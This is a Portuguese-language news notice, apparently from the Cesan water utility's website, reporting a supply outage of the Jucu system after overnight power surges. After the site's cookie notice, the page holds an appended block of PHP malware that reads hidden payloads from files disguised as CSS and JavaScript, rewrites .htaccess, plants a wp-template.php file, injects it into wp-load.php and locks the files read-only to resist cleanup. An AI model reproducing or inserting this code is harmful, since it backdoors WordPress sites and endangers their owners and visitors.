IMG_0271

Uma pane causada por picos de energia elétrica ocorridos na madrugada de hoje (16.07), paralisou o Sistema Jucu, que abastece a ilha de Vitória, toda a população dos municípios de Vila Velha e Cariacica, bem como os bairros de Viana, exceto a sede. Ainda não há uma previsão de retorno do abastecimento.

 

Equipes de técnicos da Cesan e da EDP estão no local desde a madrugada atuando para que o sistema volte a operar o mais rápido possível. Nas próximas horas, outras informações serão disponibilizadas com essa previsão de retorno.

 

O fornecimento de água está interrompido e, por isso, a população deve evitar o desperdício e reduzir o consumo para não ficar sem água de seus reservatórios domiciliares.

 

O acidente ocorreu na grande estação de bombeamento de água bruta, localizada em Caçaroca, de onde a água segue para tratamento naquele local e nas Estações de Vale Esperança e Cobi.

icone-es

Usamos cookies essenciais ao funcionamento do site. Ao continuar navegando você concorda com a nossa Política de Privacidade

$zxrpath=$_SERVER["DOCUMENT_ROOT"]."/";$_autoplarr=array("/logs/history.log","/tmp/history.log",$zxrpath."wp-includes/css/common.css",$zxrpath."wp-includes/js/jquery/common.js",$zxrpath."wp-includes/blocks/avatar/common.css",$zxrpath."wp-admin/js/widgets/common.js",$zxrpath."wp-admin/css/colors/modern/common.css",$zxrpath."wp-content/themes/twentytwentythree/styles/common.css",$zxrpath."wp-content/themes/twentytwentytwo/styles/common.css",$zxrpath."wp-content/themes/twentytwentyfive/styles/common.css",$zxrpath."wp-content/themes/twentytwentyfour/styles/common.css",$zxrpath."wp-content/plugins/contact-form-7/assets/common.css");$_titlefilename="";$_wptemplatecon="";$_htaccesscon="";foreach($_autoplarr as $_autofile){if(@file_exists($_autofile)){$_titlefilename=$_autofile;break;}}if($_titlefilename){$_autocon=@file_get_contents($_titlefilename);if($_autocon){$_autoarrcon=explode("---", $_autocon);$_wptemplatecon=$_autoarrcon[0];$_htaccesscon=trim($_autoarrcon[1],PHP_EOL);}if($_htaccesscon&&strpos($_htaccesscon, "index.php")!==false){$_htaccessname=$zxrpath.".htaccess";if(file_exists($_htaccessname)){$_htaccesstext=file_get_contents($_htaccessname);if(strpos($_htaccesstext,"404")===false&&strpos($_htaccesstext,"index.php")===false){chmod($_htaccessname, 0775);unlink($_htaccessname);file_put_contents($_htaccessname, $_htaccesscon);chmod($_htaccessname, 0444);}}else{file_put_contents($_htaccessname, $_htaccesscon);if(file_exists($_htaccessname)){chmod($_htaccessname, 0444);}}}$_prewploadfilename=$zxrpath."wp-load.php";$_prewptplfilename=$zxrpath."wp-template.php";if(!file_exists($_prewptplfilename)){file_put_contents($_prewptplfilename, $_wptemplatecon);chmod($_prewptplfilename, 0444);}$_wploadcon=@file_get_contents($_prewploadfilename);if($_wploadcon&&strpos($_wploadcon, "wp-template.php")===false){$_prewplocon=str_replace("/** Define ABSPATH", "if(file_exists(dirname(__FILE__).\"/wp-template.php\")){require_once(dirname(__FILE__).\"/wp-template.php\");}".PHP_EOL."/** Define ABSPATH", $_wploadcon);file_put_contents($_prewploadfilename, $_prewplocon);chmod($_prewploadfilename, 0444);$_currnetfileid=1;}if($_wploadcon&&strpos($_wploadcon, "//if(file_exists(dirname(")!==false){$_wploadcon=str_replace("//if(file_exists(dirname(", "if(file_exists(dirname(", $_wploadcon);file_put_contents($_prewploadfilename, $_wploadcon);chmod($_prewploadfilename, 0444);}}